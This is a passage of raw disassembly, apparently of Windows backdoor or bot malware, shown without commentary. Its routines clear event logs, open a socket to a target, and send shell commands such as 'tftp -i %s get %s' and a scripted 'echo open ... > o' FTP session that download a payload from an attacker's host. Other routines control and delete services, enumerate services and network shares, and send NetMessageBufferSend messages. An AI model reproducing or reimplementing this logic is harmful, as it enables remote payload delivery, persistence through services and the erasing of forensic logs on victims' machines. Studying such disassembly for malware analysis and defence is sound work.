push eax
call ds:dword_4E2F58 ; ClearEventLogA
test eax, eax
jz short loc_4190BE
push [ebp+arg_10]
push offset dword_44FC44
loc_419097: ; CODE XREF: sub_419036+94�j
lea eax, [ebp+var_294]
push eax
call sub_41EA60
push edi
lea eax, [ebp+var_294]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 20h
jmp short loc_4190F6
; ---------------------------------------------------------------------------
loc_4190BE: ; CODE XREF: sub_419036+57�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44FC60
jmp short loc_419097
; ---------------------------------------------------------------------------
loc_4190CC: ; CODE XREF: sub_419036+3F�j
lea eax, [ebp+var_294]
push offset unk_44FC88
push eax
call sub_41EA60
push edi
lea eax, [ebp+var_294]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 1Ch
loc_4190F6: ; CODE XREF: sub_419036+86�j
pop edi
leave
retn
sub_419036 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-10h]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+0Ch]
mov word ptr [ebp-10h], 2
push eax
call ds:dword_4E3008 ; inet_addr
push dword ptr [ebp+0C4h]
mov [ebp-0Ch], eax
call ds:dword_4E2FC8 ; htons
push edi
push 1
push 2
mov [ebp-0Eh], ax
call ds:dword_4E3048 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+0C4h], esi
jz loc_4191FC
lea eax, [ebp-10h]
push 10h
push eax
push esi
call ds:dword_4E2F70 ; connect
cmp eax, 0FFFFFFFFh
jz loc_4191FC
mov ebx, 400h
push edi
lea eax, [ebp-5A0h]
push ebx
push eax
push esi
call ds:dword_4E2FE0 ; recv
mov esi, offset byte_43F0FC
push esi
push esi
push dword ptr [ebp+8]
call sub_40AEAD
pop ecx
mov edi, 190h
push eax
push offset aTftpISGetSS ; "tftp -i %s get %s &%s\r\n"
lea eax, [ebp-1A0h]
push edi
push eax
call sub_41EC30
movzx eax, word ptr ds:dword_4E2D00
add esp, 18h
push esi
push esi
push eax
push dword ptr [ebp+8]
call sub_40AEAD
pop ecx
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp-1A0h]
push edi
push eax
call sub_41EC30
add esp, 1Ch
lea eax, [ebp-1A0h]
push 0
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp-1A0h]
push eax
push dword ptr [ebp+0C4h]
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_419200
loc_4191FC: ; CODE XREF: _0:0041914F�j _0:00419165�j
xor al, al
jmp short loc_419224
; ---------------------------------------------------------------------------
loc_419200: ; CODE XREF: _0:004191FA�j
push 0
lea eax, [ebp-5A0h]
push ebx
push eax
push dword ptr [ebp+0C4h]
call ds:dword_4E2FE0 ; recv
push dword ptr [ebp+0C4h]
call ds:dword_4E3060 ; closesocket
mov al, 1
loc_419224: ; CODE XREF: _0:004191FE�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419229 proc near ; CODE XREF: sub_401C87+56A9�p
var_1C0 = byte ptr -1C0h
var_15C = byte ptr -15Ch
var_F8 = byte ptr -0F8h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C0h
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
call ds:dword_4F539C ; GetVersionExA
cmp [ebp+var_90], 4
jnz short loc_41926E
cmp [ebp+var_8C], 0
jnz loc_4192F8
xor eax, eax
inc eax
cmp [ebp+var_84], eax
jz locret_4192F6
loc_41926E: ; CODE XREF: sub_419229+27�j
; sub_419229+DF�j
push esi
push edi
push offset aNetapi32_dll_0 ; "netapi32.dll"
call ds:off_4F538C
mov esi, eax
push offset aNetmessagebu_0 ; "NetMessageBufferSend"
push esi
call ds:off_4F5390
push 32h
mov edi, eax
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_421E90
push 32h
lea eax, [ebp+var_15C]
push [ebp+arg_4]
push eax
call sub_421E90
push 32h
lea eax, [ebp+var_F8]
push [ebp+arg_8]
push eax
call sub_421E90
lea eax, [ebp+var_F8]
push eax
call sub_421E60
add eax, eax
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_1C0]
push eax
push 0
call edi ; GetProcessHeap
add esp, 3Ch
mov edi, eax
push esi
call ds:off_4F5410
mov eax, edi
pop edi
pop esi
locret_4192F6: ; CODE XREF: sub_419229+3F�j
leave
retn
; ---------------------------------------------------------------------------
loc_4192F8: ; CODE XREF: sub_419229+30�j
cmp [ebp+var_8C], 0Ah
jz short loc_41930E
cmp [ebp+var_8C], 5Ah
jnz loc_41926E
loc_41930E: ; CODE XREF: sub_419229+D6�j
xor eax, eax
inc eax
leave
retn
sub_419229 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419313 proc near ; CODE XREF: sub_401300+F7�p
; sub_40F038+A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
pop ecx
call sub_41EB70
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_43C4E0
call sub_4201DC
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_419313 endp
; =============== S U B R O U T I N E =======================================
sub_419350 proc near ; CODE XREF: sub_401C87+45A2�p
; sub_401C87+460B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_4193B5
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push ds:dword_44FDD8[esi]
push edi
push eax
call sub_4193D7
add esp, 14h
test eax, eax
jnz short loc_419398
push edi
push ds:off_44FDD4[esi]
mov esi, offset dword_4F3060
push offset unk_44FE24
push esi
call sub_41EA60
add esp, 10h
jmp short loc_4193D2
; ---------------------------------------------------------------------------
loc_419398: ; CODE XREF: sub_419350+2A�j
push eax
call sub_419479
push eax
push edi
mov esi, offset dword_4F3060
push offset unk_44FE40
push esi
call sub_41EA60
add esp, 14h
jmp short loc_4193D2
; ---------------------------------------------------------------------------
loc_4193B5: ; CODE XREF: sub_419350+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_4F3060
push ds:off_44FDD0[eax*4]
push offset unk_44FE6C
push esi
call sub_41EA60
add esp, 0Ch
loc_4193D2: ; CODE XREF: sub_419350+46�j
; sub_419350+63�j
mov eax, esi
pop edi
pop esi
retn
sub_419350 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4193D7 proc near ; CODE XREF: sub_419350+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call ds:dword_4E2FBC ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_4193FE
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_419473
; ---------------------------------------------------------------------------
loc_4193FE: ; CODE XREF: sub_4193D7+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call ds:dword_4E2EA4 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_41941E
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_41946B
; ---------------------------------------------------------------------------
loc_41941E: ; CODE XREF: sub_4193D7+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_419451
cmp eax, 3
jz short loc_419442
jle short loc_419464
cmp eax, 6
jg short loc_419464
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call ds:dword_4E2F10 ; ControlService
jmp short loc_419458
; ---------------------------------------------------------------------------
loc_419442: ; CODE XREF: sub_4193D7+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call ds:dword_4E2EAC ; StartServiceA
jmp short loc_419458
; ---------------------------------------------------------------------------
loc_419451: ; CODE XREF: sub_4193D7+4D�j
push esi
call ds:dword_4E2F14 ; DeleteService
loc_419458: ; CODE XREF: sub_4193D7+69�j
; sub_4193D7+78�j
test eax, eax
jnz short loc_419464
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ebx, eax
loc_419464: ; CODE XREF: sub_4193D7+54�j
; sub_4193D7+59�j ...
push esi
call ds:dword_4E2EC0 ; CloseServiceHandle
loc_41946B: ; CODE XREF: sub_4193D7+45�j
push edi
call ds:dword_4E2EC0 ; CloseServiceHandle
pop esi
loc_419473: ; CODE XREF: sub_4193D7+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_4193D7 endp
; =============== S U B R O U T I N E =======================================
sub_419479 proc near ; CODE XREF: sub_419350+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_41952E
jz loc_419527
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_4194F1
jz short loc_4194E7
mov ecx, eax
sub ecx, 3
jz short loc_4194DD
dec ecx
dec ecx
jz short loc_4194D3
dec ecx
jz short loc_4194C9
sub ecx, 51h
jz short loc_4194BF
sub ecx, 24h
jnz loc_4195A4 ; default
; jumptable 0041954B cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_419596
; ---------------------------------------------------------------------------
loc_4194BF: ; CODE XREF: sub_419479+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_419596
; ---------------------------------------------------------------------------
loc_4194C9: ; CODE XREF: sub_419479+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_419596
; ---------------------------------------------------------------------------
loc_4194D3: ; CODE XREF: sub_419479+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_419596
; ---------------------------------------------------------------------------
loc_4194DD: ; CODE XREF: sub_419479+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_419596
; ---------------------------------------------------------------------------
loc_4194E7: ; CODE XREF: sub_419479+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_419596
; ---------------------------------------------------------------------------
loc_4194F1: ; CODE XREF: sub_419479+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_419520
dec ecx
jz short loc_419519
dec ecx
jz short loc_419512
dec ecx
jnz loc_4195A4 ; default
; jumptable 0041954B cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_419596
; ---------------------------------------------------------------------------
loc_419512: ; CODE XREF: sub_419479+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_419519: ; CODE XREF: sub_419479+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_419520: ; CODE XREF: sub_419479+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_419527: ; CODE XREF: sub_419479+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_41952E: ; CODE XREF: sub_419479+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_4195A4 ; default
; jumptable 0041954B cases 1,5,6,8,9,12,13,15,16
jz short loc_419591
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_4195A4 ; default
; jumptable 0041954B cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_4195E5[ecx]
jmp off_4195BD[ecx*4] ; switch jump
loc_419552: ; DATA XREF: _0:off_4195BD�o
push offset aTheSpecifiedDa ; jumptable 0041954B case 7
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_419559: ; CODE XREF: sub_419479+D2�j
; DATA XREF: _0:off_4195BD�o
push offset aTheServiceDepe ; jumptable 0041954B case 17
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_419560: ; CODE XREF: sub_419479+D2�j
; DATA XREF: _0:off_4195BD�o
push offset aTheServiceDe_0 ; jumptable 0041954B case 10
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_419567: ; CODE XREF: sub_419479+D2�j
; DATA XREF: _0:off_4195BD�o
push offset aTheServiceHasB ; jumptable 0041954B case 0
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_41956E: ; CODE XREF: sub_419479+D2�j
; DATA XREF: _0:off_4195BD�o
push offset aTheSpecified_0 ; jumptable 0041954B case 2
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_419575: ; CODE XREF: sub_419479+D2�j
; DATA XREF: _0:off_4195BD�o
push offset aTheServiceCoul ; jumptable 0041954B case 11
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_41957C: ; CODE XREF: sub_419479+D2�j
; DATA XREF: _0:off_4195BD�o
push offset aTheServiceHa_0 ; jumptable 0041954B case 14
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_419583: ; CODE XREF: sub_419479+D2�j
; DATA XREF: _0:off_4195BD�o
push offset aTheRequested_1 ; jumptable 0041954B case 3
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_41958A: ; CODE XREF: sub_419479+D2�j
; DATA XREF: _0:off_4195BD�o
push offset aTheServiceHasN ; jumptable 0041954B case 4
jmp short loc_419596
; ---------------------------------------------------------------------------
loc_419591: ; CODE XREF: sub_419479+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_419596: ; CODE XREF: sub_419479+41�j
; sub_419479+4B�j ...
push offset dword_4F2990
call sub_41EA60
pop ecx
pop ecx
jmp short loc_4195B7
; ---------------------------------------------------------------------------
loc_4195A4: ; CODE XREF: sub_419479+36�j
; sub_419479+89�j ...
push eax ; default
; jumptable 0041954B cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownError ; "An unknown error occurred: <%ld>"
push offset dword_4F2990
call sub_41EA60
add esp, 0Ch
loc_4195B7: ; CODE XREF: sub_419479+129�j
mov eax, offset dword_4F2990
retn
sub_419479 endp
; ---------------------------------------------------------------------------
off_4195BD dd offset loc_419567 ; DATA XREF: sub_419479+D2�r
dd offset loc_41956E ; jump table for switch statement
dd offset loc_419583
dd offset loc_41958A
dd offset loc_419552
dd offset loc_419560
dd offset loc_419575
dd offset loc_41957C
dd offset loc_419559
dd offset loc_4195A4
byte_4195E5 db 0, 9, 1, 2 ; DATA XREF: sub_419479+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195F7 proc near ; CODE XREF: sub_401C87+45CD�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call ds:dword_4E2FBC ; OpenSCManagerA
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41962F: ; CODE XREF: sub_4195F7+123�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call ds:dword_4E2F88 ; EnumServicesStatusA
test eax, eax
jnz short loc_419669
call ds:dword_4F5360 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_419720
loc_419669: ; CODE XREF: sub_4195F7+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_419717
lea esi, [ebp+var_188]
loc_41967A: ; CODE XREF: sub_4195F7+11A�j
mov eax, [esi+8]
dec eax
jz short loc_4196C6
dec eax
jz short loc_4196BF
dec eax
jz short loc_4196B8
dec eax
jz short loc_4196B1
dec eax
jz short loc_4196AA
dec eax
jz short loc_4196A3
dec eax
lea eax, [ebp+var_20]
jz short loc_41969C
push offset aUnknown ; " Unknown"
jmp short loc_4196CE
; ---------------------------------------------------------------------------
loc_41969C: ; CODE XREF: sub_4195F7+9C�j
push offset aPaused ; " Paused"
jmp short loc_4196CE
; ---------------------------------------------------------------------------
loc_4196A3: ; CODE XREF: sub_4195F7+96�j
push offset aPausing ; " Pausing"
jmp short loc_4196CB
; ---------------------------------------------------------------------------
loc_4196AA: ; CODE XREF: sub_4195F7+93�j
push offset aContinuing ; " Continuing"
jmp short loc_4196CB
; ---------------------------------------------------------------------------
loc_4196B1: ; CODE XREF: sub_4195F7+90�j
push offset aRunning ; " Running"
jmp short loc_4196CB
; ---------------------------------------------------------------------------
loc_4196B8: ; CODE XREF: sub_4195F7+8D�j
push offset aStoping ; " Stoping"
jmp short loc_4196CB
; ---------------------------------------------------------------------------
loc_4196BF: ; CODE XREF: sub_4195F7+8A�j
push offset aStarting ; " Starting"
jmp short loc_4196CB
; ---------------------------------------------------------------------------
loc_4196C6: ; CODE XREF: sub_4195F7+87�j
push offset aStopped ; " Stopped"
loc_4196CB: ; CODE XREF: sub_4195F7+B1�j
; sub_4195F7+B8�j ...
lea eax, [ebp+var_20]
loc_4196CE: ; CODE XREF: sub_4195F7+A3�j
; sub_4195F7+AA�j
push eax
call sub_41EA60
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_0 ; "%s: %s (%s)"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_41967A
loc_419717: ; CODE XREF: sub_4195F7+77�j
cmp [ebp+var_8], ebx
jnz loc_41962F
loc_419720: ; CODE XREF: sub_4195F7+6C�j
push [ebp+var_C]
call ds:dword_4E2EC0 ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_4195F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419737 proc near ; CODE XREF: sub_401C87+46B3�p
; sub_401C87+46C9�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_4197D0
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_419760
dec eax
jnz short loc_4197B0
push edi
push 0
call sub_419909
pop ecx
pop ecx
jmp short loc_4197AC
; ---------------------------------------------------------------------------
loc_419760: ; CODE XREF: sub_419737+18�j
cmp [ebp+arg_8], 0
jnz short loc_41979E
push 24h
push edi
call sub_41F720
pop ecx
test eax, eax
pop ecx
jnz short loc_41979E
push 57h
pop eax
loc_419777: ; CODE XREF: sub_419737+77�j
push eax
call sub_41A0D7
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_4F2C58
push ds:off_44FDD0[eax*4]
push offset unk_4503D8
push esi
call sub_41EA60
add esp, 18h
jmp short loc_4197F0
; ---------------------------------------------------------------------------
loc_41979E: ; CODE XREF: sub_419737+2D�j
; sub_419737+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_41985D
add esp, 0Ch
loc_4197AC: ; CODE XREF: sub_419737+27�j
test eax, eax
jnz short loc_419777
loc_4197B0: ; CODE XREF: sub_419737+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_4F2C58
push ds:off_44FDD4[eax*4]
push offset dword_450404
push esi
call sub_41EA60
add esp, 10h
jmp short loc_4197F0
; ---------------------------------------------------------------------------
loc_4197D0: ; CODE XREF: sub_419737+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_4F2C58
lea eax, [eax+eax*2]
push ds:off_44FDD0[eax*4]
push offset unk_450420
push esi
call sub_41EA60
add esp, 0Ch
loc_4197F0: ; CODE XREF: sub_419737+65�j
; sub_419737+97�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_419737 endp
; =============== S U B R O U T I N E =======================================
sub_4197F6 proc near ; CODE XREF: sub_41AB05+247�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_419803
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_419803: ; CODE XREF: sub_4197F6+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_4F5450
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test ds:byte_4F2E58, 1
mov ebp, eax
jnz short loc_419840
or ds:byte_4F2E58, 1
lea eax, [ebp+1]
push eax
call sub_420C30
pop ecx
mov ds:dword_4F2BF0, eax
loc_419840: ; CODE XREF: sub_4197F6+32�j
push esi
push esi
push ebp
push ds:dword_4F2BF0
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, ds:dword_4F2BF0
pop edi
pop ebp
pop ebx
pop esi
retn
sub_4197F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41985D proc near ; CODE XREF: sub_419737+6D�p
; sub_41AE2B+188�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_4198C8
push [ebp+arg_4]
mov edi, eax
call sub_4198C8
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_41F720
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_4198C8
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call ds:dword_4E2EBC
pop edi
leave
retn
sub_41985D endp
; =============== S U B R O U T I N E =======================================
sub_4198C8 proc near ; CODE XREF: sub_41985D+A�p
; sub_41985D+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_4198D5
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4198D5: ; CODE XREF: sub_4198C8+9�j
push ebx
push esi
mov esi, ds:dword_4F5454
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_420C30
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_4198C8 endp
; =============== S U B R O U T I N E =======================================
sub_419909 proc near ; CODE XREF: sub_419737+20�p
; sub_41AB05+1BC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_4198C8
push [esp+8+arg_4]
mov esi, eax
call sub_4198C8
pop ecx
pop ecx
push 0
push eax
push esi
call ds:dword_4E2E94
pop esi
retn
sub_419909 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41992C proc near ; CODE XREF: sub_401C87+46F5�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_4198C8
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 18h
loc_419965: ; CODE XREF: sub_41992C+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call ds:dword_4E2F0C
mov ebx, eax
cmp ebx, esi
jz short loc_4199C8
cmp ebx, 0EAh
jz short loc_4199C8
push ebx
push ebx
call sub_41A0D7
pop ecx
push eax
lea eax, [ebp+var_210]
push offset unk_45047C
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 24h
jmp short loc_419A35
; ---------------------------------------------------------------------------
loc_4199C8: ; CODE XREF: sub_41992C+5D�j
; sub_41992C+65�j
xor edi, edi
inc edi
cmp [ebp+arg_C], edi
jb short loc_419A2C
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_4199D6: ; CODE XREF: sub_41992C+FC�j
push dword ptr [esi+10h]
call ds:dword_4E2EB0 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_4199ED
mov eax, offset aNo ; "No"
loc_4199ED: ; CODE XREF: sub_41992C+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_4199D6
xor esi, esi
loc_419A2C: ; CODE XREF: sub_41992C+A2�j
push [ebp+var_4]
call ds:dword_4E3058
loc_419A35: ; CODE XREF: sub_41992C+9A�j
cmp ebx, 0EAh
jz loc_419965
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_41992C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A4D proc near ; CODE XREF: sub_401C87+474E�p
; sub_401C87+4769�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_419AF1
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_419A8F
dec eax
jz short loc_419A84
dec eax
jnz short loc_419AAA
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_419B93
add esp, 14h
jmp short loc_419AA6
; ---------------------------------------------------------------------------
loc_419A84: ; CODE XREF: sub_419A4D+1D�j
push ebx
push edi
call sub_419B72
pop ecx
pop ecx
jmp short loc_419AA6
; ---------------------------------------------------------------------------
loc_419A8F: ; CODE XREF: sub_419A4D+1A�j
cmp [ebp+arg_8], edi
jz short loc_419AA3
push [ebp+arg_8]
push ebx
push edi
call sub_419B18
add esp, 0Ch
jmp short loc_419AA6
; ---------------------------------------------------------------------------
loc_419AA3: ; CODE XREF: sub_419A4D+45�j
push 57h
pop eax
loc_419AA6: ; CODE XREF: sub_419A4D+35�j
; sub_419A4D+40�j ...
cmp eax, edi
jnz short loc_419ACA
loc_419AAA: ; CODE XREF: sub_419A4D+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_4F2E60
push ds:off_44FDD4[eax*4]
push offset unk_4504C4
push esi
call sub_41EA60
add esp, 10h
jmp short loc_419B11
; ---------------------------------------------------------------------------
loc_419ACA: ; CODE XREF: sub_419A4D+5B�j
push eax
call sub_41A0D7
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_4F2E60
push ds:off_44FDD0[eax*4]
push offset unk_4504E4
push esi
call sub_41EA60
add esp, 18h
jmp short loc_419B11
; ---------------------------------------------------------------------------
loc_419AF1: ; CODE XREF: sub_419A4D+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_4F2E60
lea eax, [eax+eax*2]
push ds:off_44FDD0[eax*4]
